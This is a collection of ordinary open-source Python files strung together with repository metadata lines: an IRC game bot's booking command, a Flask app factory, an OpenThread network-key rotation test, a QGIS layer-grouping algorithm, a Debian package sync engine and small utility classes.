if i and i.alliance and i.alliance.lower() == "ascendancy":
self.client.reply(
prefix,
nick,
target,
"%s:%s:%s is %s in Ascendancy. Quick, launch before they notice the highlight."
% (x, y, z, i.nick or "someone"),
)
return 0
curtick = self.current_tick()
tick = -1
eta = -1
if when < 80:
tick = curtick + when
eta = when
elif when < curtick:
self.client.reply(
prefix,
nick,
target,
"Can not book targets in the past. You wanted tick %s, but current tick is %s."
% (when, curtick),
)
return 1
else:
tick = when
eta = tick - curtick
if tick > 32767:
tick = 32767
args = ()
query = "SELECT t1.id AS id, t1.nick AS nick, t1.pid AS pid, t1.tick AS tick, t1.uid AS uid, t2.pnick AS pnick, t2.userlevel AS userlevel, t3.x AS x, t3.y AS y, t3.z AS z"
query += " FROM target AS t1"
query += " INNER JOIN planet_dump AS t3 ON t1.pid=t3.id"
query += " LEFT JOIN user_list AS t2 ON t1.uid=t2.id"
query += " WHERE"
query += " t1.tick > %s"
query += (
" AND t3.tick = (SELECT MAX(tick) FROM updates) AND t3.x=%s AND t3.y=%s"
)
query += " AND t3.z=%s"
self.cursor.execute(query, (tick, x, y, z))
if self.cursor.rowcount > 0 and not override:
reply = (
"There are already bookings for that target after landing pt %s (eta %s). To see status on this target, do !status %s:%s:%s."
% (tick, eta, x, y, z)
)
reply += (
" To force booking at your desired eta/landing tick, use !book %s:%s:%s %s yes (Bookers:"
% (x, y, z, tick)
)
prev = []
for r in self.cursor.fetchall():
owner = "nick:" + r["nick"]
if r["pnick"]:
owner = "user:" + r["pnick"]
prev.append("(%s %s)" % (r["tick"], owner))
reply += " " + string.join(prev, ", ")
reply += " )"
self.client.reply(prefix, nick, target, reply)
return 1
uid = None
if user:
u = loadable.user(pnick=user)
if u.load_from_db(self.conn, self.client, self.cursor):
uid = u.id
query = "INSERT INTO target (nick,pid,tick,uid) VALUES (%s,%s,%s,%s)"
try:
s | elf.cursor.execute(query, (nick, p.id, tick, uid))
if uid:
reply = "Booked landing on %s:%s:%s tick %s for user %s" % (
p.x,
p.y,
p.z,
tick,
user,
| )
else:
reply = "Booked landing on %s:%s:%s tick %s for nick %s" % (
p.x,
p.y,
p.z,
tick,
nick,
)
except psycopg.IntegrityError:
query = "SELECT t1.id AS id, t1.nick AS nick, t1.pid AS pid, t1.tick AS tick, t1.uid AS uid, t2.pnick AS pnick, t2.userlevel AS userlevel "
query += " FROM target AS t1 LEFT JOIN user_list AS t2 ON t1.uid=t2.id "
query += " WHERE t1.pid=%s AND t1.tick=%s"
self.cursor.execute(query, (p.id, tick))
book = self.cursor.fetchone()
if not book:
raise Exception(
"Integrity error? Unable to booking for pid %s and tick %s"
% (p.id, tick)
)
if book["pnick"]:
reply = (
"Target %s:%s:%s is already booked for landing tick %s by user %s"
% (p.x, p.y, p.z, book["tick"], book["pnick"])
)
else:
reply = (
"Target %s:%s:%s is already booked for landing tick %s by nick %s"
% (p.x, p.y, p.z, book["tick"], book["nick"])
)
except:
raise
self.client.reply(prefix, nick, target, reply)
return 1
|
ukgovdatascience/classifyintentsapp | app/__init__.py | Python | mit | 1,824 | 0 | from flask import Flask
from flask_bootstrap import Bootstrap
from flask_moment import Moment
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_pagedown import PageDown
bootstrap = Bootstrap()
moment = Moment()
db = SQLAlchemy()
pagedown = PageDown()
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
def create_app(config_name):
    """Application factory: build and configure a Flask app instance.

    config_name selects an entry from config.config (e.g. 'development',
    'production').  (Corrupted token restored: the 'Pragma' header key in
    apply_caching below.)
    """
    app = Flask(__name__)
    # import config here rather than at module level to ensure that .env values
    # are loaded into the environment first when running manage.py
    from config import config
    app.config.from_object(config[config_name])
    config[config_name].init_app(app)
    bootstrap.init_app(app)
    # Set jquery version
    from flask_bootstrap import WebCDN
    app.extensions['bootstrap']['cdns']['jquery'] = WebCDN(
        '//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/'
    )
    moment.init_app(app)
    db.init_app(app)
    login_manager.init_app(app)
    pagedown.init_app(app)
    if not app.debug and not app.testing and not app.config['SSL_DISABLE']:
        from flask_sslify import SSLify
        sslify = SSLify(app)
    from .main import main as main_blueprint
    app.register_blueprint(main_blueprint)
    from .auth import auth as auth_blueprint
    app.register_blueprint(auth_blueprint, url_prefix='/auth')
    # Tell browser not to cache any HTML responses, as most pages have
    # sensitive information in them. (But CSS should be cached as normal.)
    @app.after_request
    def apply_caching(response):
        if response.headers.get('Content-Type', '').startswith('text/html'):
            response.headers['Cache-control'] = 'no-store'
            response.headers['Pragma'] = 'no-cache'
        return response
    return app
|
LeZhang2016/openthread | tests/scripts/thread-cert/Cert_9_2_18_RollBackActiveTimestamp.py | Python | bsd-3-clause | 6,936 | 0.001153 | #!/usr/bin/env python
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import time
import unittest
import config
import node
# Network master keys: KEY1 before the dataset rotation, KEY2 after.
KEY1 = '00112233445566778899aabbccddeeff'
KEY2 = 'ffeeddccbbaa99887766554433221100'
# Initial radio channel and PAN ID shared by the whole topology.
CHANNEL_INIT = 19
PANID_INIT = 0xface
# Node identifiers (keys of the self.nodes dict built in setUp()).
COMMISSIONER = 1
LEADER = 2
ROUTER1 = 3
ROUTER2 = 4
ED1 = 5
SED1 = 6
# Minimal Thread devices: end device and sleepy end device.
MTDS = [ED1, SED1]
class Cert_9_2_18_RollBackActiveTimestamp(unittest.TestCase):
    """Thread certification test 9.2.18.

    Verifies that a pending operational dataset rolls back the active
    timestamp and rotates the network master key to KEY2 after the delay
    timer expires, while ROUTER2 (kept offline during the rotation)
    retains KEY1 and consequently forms its own partition when started.
    """

    def setUp(self):
        # Build the six-node topology; whitelists enforce the intended
        # link layout (COMMISSIONER - LEADER - ROUTER1 - {ROUTER2, ED1, SED1}).
        self.simulator = config.create_default_simulator()
        self.nodes = {}
        for i in range(1,7):
            self.nodes[i] = node.Node(i, (i in MTDS), simulator=self.simulator)
        self.nodes[COMMISSIONER].set_active_dataset(1, channel=CHANNEL_INIT, panid=PANID_INIT, master_key=KEY1)
        self.nodes[COMMISSIONER].set_mode('rsdn')
        self.nodes[COMMISSIONER].add_whitelist(self.nodes[LEADER].get_addr64())
        self.nodes[COMMISSIONER].enable_whitelist()
        self.nodes[COMMISSIONER].set_router_selection_jitter(1)
        self.nodes[LEADER].set_active_dataset(1, channel=CHANNEL_INIT, panid=PANID_INIT, master_key=KEY1)
        self.nodes[LEADER].set_mode('rsdn')
        self.nodes[LEADER].set_partition_id(0xffffffff)
        self.nodes[LEADER].add_whitelist(self.nodes[COMMISSIONER].get_addr64())
        self.nodes[LEADER].add_whitelist(self.nodes[ROUTER1].get_addr64())
        self.nodes[LEADER].enable_whitelist()
        self.nodes[LEADER].set_router_selection_jitter(1)
        self.nodes[ROUTER1].set_active_dataset(1, channel=CHANNEL_INIT, panid=PANID_INIT, master_key=KEY1)
        self.nodes[ROUTER1].set_mode('rsdn')
        self.nodes[ROUTER1].add_whitelist(self.nodes[LEADER].get_addr64())
        self.nodes[ROUTER1].add_whitelist(self.nodes[ROUTER2].get_addr64())
        self.nodes[ROUTER1].add_whitelist(self.nodes[ED1].get_addr64())
        self.nodes[ROUTER1].add_whitelist(self.nodes[SED1].get_addr64())
        self.nodes[ROUTER1].enable_whitelist()
        self.nodes[ROUTER1].set_router_selection_jitter(1)
        self.nodes[ROUTER2].set_active_dataset(1, channel=CHANNEL_INIT, panid=PANID_INIT, master_key=KEY1)
        self.nodes[ROUTER2].set_mode('rsdn')
        self.nodes[ROUTER2].add_whitelist(self.nodes[ROUTER1].get_addr64())
        self.nodes[ROUTER2].enable_whitelist()
        self.nodes[ROUTER2].set_router_selection_jitter(1)
        self.nodes[ED1].set_channel(CHANNEL_INIT)
        self.nodes[ED1].set_masterkey(KEY1)
        self.nodes[ED1].set_mode('rsn')
        self.nodes[ED1].set_panid(PANID_INIT)
        self.nodes[ED1].add_whitelist(self.nodes[ROUTER1].get_addr64())
        self.nodes[ED1].enable_whitelist()
        self.nodes[SED1].set_channel(CHANNEL_INIT)
        self.nodes[SED1].set_masterkey(KEY1)
        self.nodes[SED1].set_mode('s')
        self.nodes[SED1].set_panid(PANID_INIT)
        self.nodes[SED1].add_whitelist(self.nodes[ROUTER1].get_addr64())
        self.nodes[SED1].enable_whitelist()
        self.nodes[SED1].set_timeout(config.DEFAULT_CHILD_TIMEOUT)

    def tearDown(self):
        # Loop variable renamed from `node` to `device`: the previous name
        # shadowed the imported `node` module inside this method.
        for device in list(self.nodes.values()):
            device.stop()
            device.destroy()

    def test(self):
        # Bring up the network (ROUTER2 deliberately stays offline).
        self.nodes[LEADER].start()
        self.simulator.go(5)
        self.assertEqual(self.nodes[LEADER].get_state(), 'leader')
        self.nodes[COMMISSIONER].start()
        self.simulator.go(5)
        self.assertEqual(self.nodes[COMMISSIONER].get_state(), 'router')
        self.nodes[COMMISSIONER].commissioner_start()
        self.simulator.go(3)
        self.nodes[ROUTER1].start()
        self.simulator.go(5)
        self.assertEqual(self.nodes[ROUTER1].get_state(), 'router')
        self.nodes[ED1].start()
        self.simulator.go(5)
        self.assertEqual(self.nodes[ED1].get_state(), 'child')
        self.nodes[SED1].start()
        self.simulator.go(5)
        self.assertEqual(self.nodes[SED1].get_state(), 'child')
        # Raise the active timestamp well above the pending one below.
        self.nodes[COMMISSIONER].send_mgmt_active_set(active_timestamp=20000,
                                                      network_name='GRL')
        self.simulator.go(5)
        # First pending set is superseded by the second before it commits.
        self.nodes[COMMISSIONER].send_mgmt_pending_set(pending_timestamp=20,
                                                       active_timestamp=20,
                                                       delay_timer=20000,
                                                       network_name='Shouldnotbe')
        self.simulator.go(5)
        # Rolled-back active timestamp (20 < 20000) plus a new master key.
        self.nodes[COMMISSIONER].send_mgmt_pending_set(pending_timestamp=20,
                                                       active_timestamp=20,
                                                       delay_timer=20000,
                                                       network_name='MyHouse',
                                                       master_key=KEY2)
        # Wait past the delay timer so the pending dataset takes effect.
        self.simulator.go(310)
        self.assertEqual(self.nodes[COMMISSIONER].get_masterkey(), KEY2)
        self.assertEqual(self.nodes[LEADER].get_masterkey(), KEY2)
        self.assertEqual(self.nodes[ROUTER1].get_masterkey(), KEY2)
        self.assertEqual(self.nodes[ED1].get_masterkey(), KEY2)
        self.assertEqual(self.nodes[SED1].get_masterkey(), KEY2)
        # ROUTER2 missed the rotation and still holds the old key...
        self.assertEqual(self.nodes[ROUTER2].get_masterkey(), KEY1)
        # ...so it cannot join the rekeyed network and leads its own partition.
        self.nodes[ROUTER2].start()
        self.simulator.go(5)
        self.assertEqual(self.nodes[ROUTER2].get_state(), 'leader')
# Run the certification test when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
|
sigurdga/samklang-menu | samklang_menu/widgets.py | Python | agpl-3.0 | 420 | 0 | class Widget(obje | ct):
def __init__(self, options, *args, **kwargs):
super(Widget, self).__init__(*args, **kwargs)
self.options = options
def get_display_name(self):
raise NotImplementedError
|
def render(self, request):
raise NotImplementedError
def render_option_form(self):
raise NotImplementedError
def get_option_dict(self):
return self.options
|
arve0/leicacam | async_client.py | Python | mit | 715 | 0 | """Test client using asyncio."""
import asyncio
from leicacam.async_cam import AsyncCAM
async def run(loop):
    """Run client.

    Pure network I/O demo against a Leica CAM server.
    NOTE(review): assumes a CAM server is reachable on AsyncCAM's default
    host/port -- confirm before running.
    """
    cam = AsyncCAM(loop=loop)
    await cam.connect()
    print(cam.welcome_msg)
    await cam.send(b"/cmd:deletelist")
    print(await cam.receive())
    await cam.send(b"/cmd:deletelist")
    # wait_for presumably blocks until a message with the given cmd arrives
    # or the timeout expires -- verify against leicacam's AsyncCAM docs.
    print(await cam.wait_for(cmd="cmd", timeout=0.1))
    await cam.send(b"/cmd:deletelist")
    print(await cam.wait_for(cmd="cmd", timeout=0))
    print(await cam.wait_for(cmd="cmd", timeout=0.1))
    print(await cam.wait_for(cmd="test", timeout=0.1))
    cam.close()
if __name__ == "__main__":
    # Drive the demo client on a dedicated event loop, then dispose of it.
    LOOP = asyncio.new_event_loop()
    LOOP.run_until_complete(run(LOOP))
    LOOP.close()
|
lkorigin/laniakea | src/synchrotron/synchrotron/syncengine.py | Python | gpl-3.0 | 24,637 | 0.003937 | # Copyright (C) 2016-2020 Matthias Klumpp <matthias@tenstral.net>
#
# Licensed under the GNU Lesser General Public License Version 3
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the license, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
import re
from typing import List
from apt_pkg import version_compare
from laniakea import LocalConfig, LkModule
from laniakea.repository import Repository, make_newest_packages_dict, version_revision
from laniakea.db import session_scope, config_get_distro_tag, \
ArchiveSuite, ArchiveComponent, ArchiveArchitecture, SourcePackage, SynchrotronIssue, \
SynchrotronIssueKind, SynchrotronSource, SynchrotronConfig, SyncBlacklistEntry
from laniakea.dakbridge import DakBridge
from laniakea.logging import log
from laniakea.msgstream import EventEmitter
class SyncEngine:
'''
Execute package synchronization in Synchrotron
'''
    def __init__(self, target_suite_name: str, source_suite_name: str):
        """Prepare a sync engine importing packages from *source_suite_name*
        of the configured sync source into *target_suite_name* of the
        master archive repository."""
        self._lconf = LocalConfig()
        self._dak = DakBridge()

        # FIXME: Don't hardcode this!
        repo_name = 'master'

        # the repository of the distribution we import stuff into
        self._target_repo = Repository(self._lconf.archive_root_dir,
                                       repo_name)
        self._target_repo.set_trusted(True)

        self._target_suite_name = target_suite_name
        self._source_suite_name = source_suite_name
        self._distro_tag = config_get_distro_tag()
        # source packages successfully imported during this engine's lifetime
        self._synced_source_pkgs = []

        with session_scope() as session:
            sync_source = session.query(SynchrotronSource) \
                .filter(SynchrotronSource.suite_name == self._source_suite_name).one()

            # FIXME: Synchrotron needs adjustments to work
            # better with the new "multiple autosync tasks" model.
            # This code will need to be revised for that
            # (currently it is just a 1:1 translation from D code)

            # the repository of the distribution we use to sync stuff from
            self._source_repo = Repository(sync_source.repo_url,
                                           sync_source.os_name,
                                           self._lconf.synchrotron_sourcekeyrings)

        # we trust everything by default
        self._imports_trusted = True

        with session_scope() as session:
            self._sync_blacklist = set([value for value, in session.query(SyncBlacklistEntry.pkgname)])
def _publish_synced_spkg_events(self, src_os, src_suite, dest_suite, forced=False, emitter=None):
''' Submit events for the synced source packages to the message stream '''
if not emitter:
emitter = EventEmitter(LkModule.SYNCHROTRON)
for spkg in self._synced_source_pkgs:
data = {'name': spkg.name,
'version': spkg.version,
'src_os': src_os,
'suite_src': src_suite,
'suite_dest': dest_suite,
'forced': forced}
emitter.submit_event('src-package-imported', data)
def _get_repo_source_package_map(self, repo, suite_name: str, component_name: str):
''' Get an associative array of the newest source packages present in a repository. '''
suite = ArchiveSuite(suite_name)
component = ArchiveComponent(component_name)
spkgs = repo.source_packages(suite, component)
return make_newest_packages_dict(spkgs)
def _get_repo_binary_package_map(self, repo, suite_name: str, component_name: str,
arch_name: str = None, with_installer: bool = True):
''' Get an associative array of the newest binary packages present in a repository. '''
suite = ArchiveSuite(suite_name)
component = ArchiveComponent(component_name)
arch = ArchiveArchitecture(arch_name)
arch_all = ArchiveArchitecture('all')
bpkgs = repo.binary_packages(suite, component, arch)
bpkgs.extend(repo.binary_packages(suite, component, arch_all)) # always append arch:all packages
if with_installer:
# add d-i packages to the mix
bpkgs.extend(repo.installer_packages(suite, component, arch))
bpkgs.extend(repo.installer_packages(suite, component, arch_all)) # always append arch:all packages
return make_newest_packages_dict(bpkgs)
    def _get_target_source_packages(self, component: str):
        ''' Get mapping of all sources packages in a suite and its parent suite.

        Packages from the child suite shadow same-named packages from the
        parent only if they carry a newer version. '''
        with session_scope() as session:
            target_suite = session.query(ArchiveSuite) \
                .filter(ArchiveSuite.name == self._target_suite_name).one()
            suite_pkgmap = self._get_repo_source_package_map(self._target_repo,
                                                             target_suite.name,
                                                             component)
            if target_suite.parent:
                # we have a parent suite
                parent_map = self._get_repo_source_package_map(self._target_repo,
                                                               target_suite.parent.name,
                                                               component)
                # merge the two arrays, keeping only the latest versions
                suite_pkgmap = make_newest_packages_dict(list(parent_map.values()) + list(suite_pkgmap.values()))

        return suite_pkgmap
    def _import_package_files(self, suite: str, component: str, fnames: List[str]):
        ''' Import an arbitrary amount of packages via the archive management software. '''
        # NOTE(review): the two trailing flags are passed to DakBridge as
        # (trusted, <second flag>) -- the meaning of the final True is
        # inferred from DakBridge.import_package_files; confirm there.
        return self._dak.import_package_files(suite, component, fnames, self._imports_trusted, True)
def _import_source_package(self, spkg: SourcePackage, component: str) -> bool:
'''
Import a source package from the source repository into the
target repo.
'''
dscfile = None
for f in spkg.files:
# the source repository might be on a remote location, so we need to
# request each file to be | the | re.
# (dak will fetch the files referenced in the .dsc file from the same directory)
if f.fname.endswith('.dsc'):
dscfile = self._source_repo.get_file(f)
self._source_repo.get_file(f)
if not dscfile:
log.error('Critical consistency error: Source package {} in repository {} has no .dsc file.'
.format(spkg.name, self._source_repo.base_dir))
return False
if self._import_package_files(self._target_suite_name, component, [dscfile]):
self._synced_source_pkgs.append(spkg)
return True
return False
def _import_binaries_for_source(self, sync_conf, target_suite, component: str, spkgs: List[SourcePackage],
ignore_target_changes: bool = False) -> bool:
''' Import binary packages for the given set of source packages into the archive. '''
if not sync_conf.sync_binaries:
log.debug('Skipping binary syncs.')
return True
# list of valid architectrures supported by the target
target_archs = [a.name for a in target_suite.architectures]
# cache of binary-package mappings for the source
src_bpkg_arch_map = {}
for aname in target_archs:
src_bpkg_arch_map[aname] = self._get_repo_binary_package_map(self._source_repo, self._source_suite_name, component, aname)
|
curly-brace/VkCheckerPy | vk_api/utils.py | Python | mit | 1,122 | 0.000941 | # -*- coding: utf-8 -*-
"""
@author: Kirill Python
@contact: https://vk.com/python273
@license Apache License, Version 2.0, see LICENSE file
Copyright (C) 2016
"""
try:
import simplejson as json
except ImportError:
| import json
def search_re(reg, string):
    """Return the first captured group of *reg* found in *string*.

    Returns None when the pattern does not match.
    """
    match = reg.search(string)
    return match.groups()[0] if match else None
def clean_string(s):
    """Strip *s* and remove all inner spaces; returns None for falsy input."""
    if not s:
        return None
    return s.strip().replace(' ', '')
def code_from_number(prefix, postfix, number):
    """Return the middle digits of *number* between *prefix* and *postfix*.

    A leading '+' is ignored. Returns None when the number is too short or
    does not start/end with the given parts. Slice comparisons (rather
    than startswith/endswith) are kept deliberately so that an empty
    postfix behaves exactly as before.
    """
    if number[0] == '+':
        number = number[1:]

    head = len(prefix)
    tail = len(postfix)

    if (head + tail) >= len(number):
        return None

    # Compare the beginning of the number
    if number[:head] != prefix:
        return None

    # Compare the end of the number
    if number[-tail:] != postfix:
        return None

    return number[head:-tail]
def sjson_dumps(*args, **kwargs):
    """json.dumps with compact separators and non-ASCII left unescaped."""
    kwargs.update(ensure_ascii=False, separators=(',', ':'))
    return json.dumps(*args, **kwargs)
obi-two/Rebelion | data/scripts/templates/object/tangible/hq_destructible/shared_power_regulator.py | Python | mit | 453 | 0.046358 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEAS | E SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/hq_destructible/shared_power_regulator.iff"
result.attribute_template_id = -1
result.stfName("hq","power_regulator")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
| return result |
lcoandrade/DsgTools | core/DSGToolsProcessingAlgs/Algs/LayerManagementAlgs/groupLayersAlgorithm.py | Python | gpl-2.0 | 8,547 | 0.000819 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
DsgTools
A QGIS plugin
Brazilian Army Cartographic Production Tools
-------------------
be | gin : | 2019-04-26
git sha : $Format:%H$
copyright : (C) 2019 by Philipe Borba -
Cartographic Engineer @ Brazilian Army
email : borba.philipe@eb.mil.br
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import os
from PyQt5.QtCore import QCoreApplication
from qgis.core import (QgsDataSourceUri, QgsExpression, QgsExpressionContext,
QgsExpressionContextUtils, QgsProcessing,
QgsProcessingAlgorithm,
QgsProcessingOutputMultipleLayers,
QgsProcessingParameterExpression,
QgsProcessingParameterMultipleLayers,
QgsProcessingParameterNumber,
QgsProcessingParameterString, QgsProject)
from qgis.utils import iface
class GroupLayersAlgorithm(QgsProcessingAlgorithm):
"""
Algorithm to group layers according to primitive, dataset and a category.
INPUT_LAYERS: list of QgsVectorLayer
CATEGORY_TOKEN: token used to split layer name
CATEGORY_TOKEN_INDEX: index of the split list
OUTPUT: list of outputs
"""
INPUT_LAYERS = 'INPUT_LAYERS'
CATEGORY_EXPRESSION = 'CATEGORY_EXPRESSION'
OUTPUT = 'OUTPUT'
    def initAlgorithm(self, config):
        """
        Parameter setting.

        Declares the vector-layer list input, the category expression
        (default: everything up to the first underscore of the layer name)
        and the pass-through output layer list.
        """
        self.addParameter(
            QgsProcessingParameterMultipleLayers(
                self.INPUT_LAYERS,
                self.tr('Input Layers'),
                QgsProcessing.TypeVector
            )
        )
        self.addParameter(
            QgsProcessingParameterExpression(
                self.CATEGORY_EXPRESSION,
                self.tr('Expression used to find out the category'),
                defaultValue="regexp_substr(@layer_name ,'([^_]+)')"
            )
        )
        self.addOutput(
            QgsProcessingOutputMultipleLayers(
                self.OUTPUT,
                self.tr('Original reorganized layers')
            )
        )
    def processAlgorithm(self, parameters, context, feedback):
        """
        Here is where the processing itself takes place.

        Moves every input layer into a layer-tree path of the form
        <database root> / <geometry type> / <category>, where the category
        comes from evaluating CATEGORY_EXPRESSION on the layer.
        """
        inputLyrList = self.parameterAsLayerList(
            parameters,
            self.INPUT_LAYERS,
            context
        )
        categoryExpression = self.parameterAsExpression(
            parameters,
            self.CATEGORY_EXPRESSION,
            context
        )
        listSize = len(inputLyrList)
        # avoid division by zero when no layers were selected
        progressStep = 100/listSize if listSize else 0
        rootNode = QgsProject.instance().layerTreeRoot()
        # points first, then lines, polygons; alphabetical within each type
        inputLyrList.sort(key=lambda x: (x.geometryType(), x.name()))
        # QgsWkbTypes geometry-type codes -> group labels
        geometryNodeDict = {
            0 : self.tr('Point'),
            1 : self.tr('Line'),
            2 : self.tr('Polygon'),
            4 : self.tr('Non spatial')
        }
        # freeze the canvas so moving layers does not trigger a redraw each time
        iface.mapCanvas().freeze(True)
        for current, lyr in enumerate(inputLyrList):
            if feedback.isCanceled():
                break
            rootDatabaseNode = self.getLayerRootNode(lyr, rootNode)
            geometryNode = self.createGroup(
                geometryNodeDict[lyr.geometryType()],
                rootDatabaseNode
            )
            categoryNode = self.getLayerCategoryNode(
                lyr,
                geometryNode,
                categoryExpression
            )
            # clone the existing tree entry into its new group, then drop
            # the original
            lyrNode = rootNode.findLayer(lyr.id())
            myClone = lyrNode.clone()
            categoryNode.addChildNode(myClone)
            # not thread safe, must set flag to FlagNoThreading
            rootNode.removeChildNode(lyrNode)
            feedback.setProgress(current*progressStep)
        iface.mapCanvas().freeze(False)
        return {self.OUTPUT: [i.id() for i in inputLyrList]}
def getLayerRootNode(self, lyr, rootNode):
"""
Finds the database name of the layer and creates (if not exists)
a node with the found name.
lyr: (QgsVectorLayer)
rootNode: (node item)
"""
uriText = lyr.dataProvider().dataSourceUri()
candidateUri = QgsDataSourceUri(uriText)
rootNodeName = candidateUri.database()
if not rootNodeName:
rootNodeName = self.getRootNodeName(uriText)
#creates database root
return self.createGroup(rootNodeName, rootNode)
def getRootNodeName(self, uriText):
"""
Gets root node name from uri according to provider type.
"""
if 'memory?' in uriText:
rootNodeName = 'memory'
elif 'dbname' in uriText:
rootNodeName = uriText.replace('dbname=', '').split(' ')[0]
elif '|' in uriText:
rootNodeName = os.path.dirname(uriText.split(' ')[0].split('|')[0])
else:
rootNodeName = 'unrecognised_format'
return rootNodeName
def getLayerCategoryNode(self, lyr, rootNode, categoryExpression):
"""
Finds category node based on category expression
and creates it (if not exists a node)
"""
exp = QgsExpression(categoryExpression)
context = QgsExpressionContext()
context.appendScopes(
QgsExpressionContextUtils.globalProjectLayerScopes(lyr)
)
if exp.hasParserError():
raise Exception(exp.parserErrorString())
if exp.hasEvalError():
raise ValueError(exp.evalErrorString())
categoryText = exp.evaluate(context)
return self.createGroup(categoryText, rootNode)
def createGroup(self, groupName, rootNode):
"""
Create group with the name groupName and parent rootNode.
"""
groupNode = rootNode.findGroup(groupName)
return groupNode if groupNode else rootNode.addGroup(groupName)
def name(self):
"""
Returns the algorithm name, used for identifying the algorithm. This
string should be fixed for the algorithm, and must not be localised.
The name should be unique within each provider. Names should contain
lowercase alphanumeric characters only and no spaces or other
formatting characters.
"""
return 'grouplayers'
def displayName(self):
"""
Returns the translated algorithm name, which should be used for any
user-visible display of the algorithm name.
"""
return self.tr('Group Layers')
def group(self):
"""
Returns the name of the group this algorithm belongs to. This string
should be localised.
"""
return self.tr('Layer Management Algorithms')
def groupId(self):
"""
Returns the unique ID of the group this algorithm belongs to. This
string should be fixed for the algorithm, and must not be localised.
The group id should be unique within each provider. Group id should
contain lowercase alphanumeric characters only and no spaces or other
formatting characters.
"""
return 'DSGTools: Layer Management Algorithms'
    def tr(self, string):
        """
        Translates input string via the Qt translation system.

        The context name must match the class name so translation
        catalogues resolve correctly.
        """
        return QCoreApplication.translate('GroupLayersAlgorithm', string)
def createInstan |
zeeshanali/blaze | blaze/compute/ops/__init__.py | Python | bsd-3-clause | 136 | 0.007353 | # -*- coding: utf-8 | -*-
from __future__ import print_function, division, absolute_import
from .ufuncs import *
from .reduct | ion import * |
venthur/pyff | src/lib/speller/__init__.py | Python | gpl-2.0 | 4,287 | 0.000233 | __copyright__ = """ Copyright (c) 2011 Torsten Schmits
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 3 of the License, or (at your
option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
"""
import string
from lib.speller.trial import *
from lib.speller.input import *
from lib.speller.experiment import *
__all__ = ['Speller']
class Speller(object):
    """Base speller mix-in.

    NOTE(review): relies on a cooperating superclass in the MRO providing
    update_parameters(), keyboard_input(), stimulus_sequence() and the
    _view/_trigger/_iter/_flag attributes -- presumably a pyff Feedback
    base class; confirm against the concrete speller subclasses.
    """

    # Class-level registration slots filled by the decorator helpers below
    # (name-mangled to _Speller__*).
    __stimulus = None
    __sequences = None
    __stim_gen = None

    def __init__(self):
        self.__init_attributes()

    def __init_attributes(self):
        # Default configuration for a spelling session.
        self._trial_types = ['Calibration', 'FreeSpelling', 'CopySpelling']
        # 1: Calibration 2: FreeSpelling 3: CopySpelling
        self.trial_type = 3
        self.phrases = ['BBCI_MATRIX']
        self.symbols = string.ascii_uppercase + '_,.<'
        self.delete_symbol = '<'
        self.inter_trial = .1
        self.inter_phrase = .1
        # display countdown before each letter
        self.trial_countdown = False
        # display countdown before each phrase
        self.phrase_countdown = True
        self.countdown_symbol_duration = .1
        self.countdown_start = 1
        # allow classifier input to be simulated by keyboard
        self.allow_keyboard_input = True
        self.target_present_time = .1

    def update_parameters(self):
        super(Speller, self).update_parameters()
        # Map the 1-based trial_type setting onto its name.
        self._trial_name = self._trial_types[self.trial_type - 1]
        self.setup_speller()

    @classmethod
    def stimulus(self, f):
        # Decorator: register f as the stimulus-sequence callable.
        self.__stimulus = f
        return f

    @classmethod
    def stimulus_generator(self, **kw):
        # Decorator factory: register f as a stimulus generator and keep the
        # keyword arguments for the stimulus_sequence() call made later.
        def decorate(f):
            self.__stim_gen = f
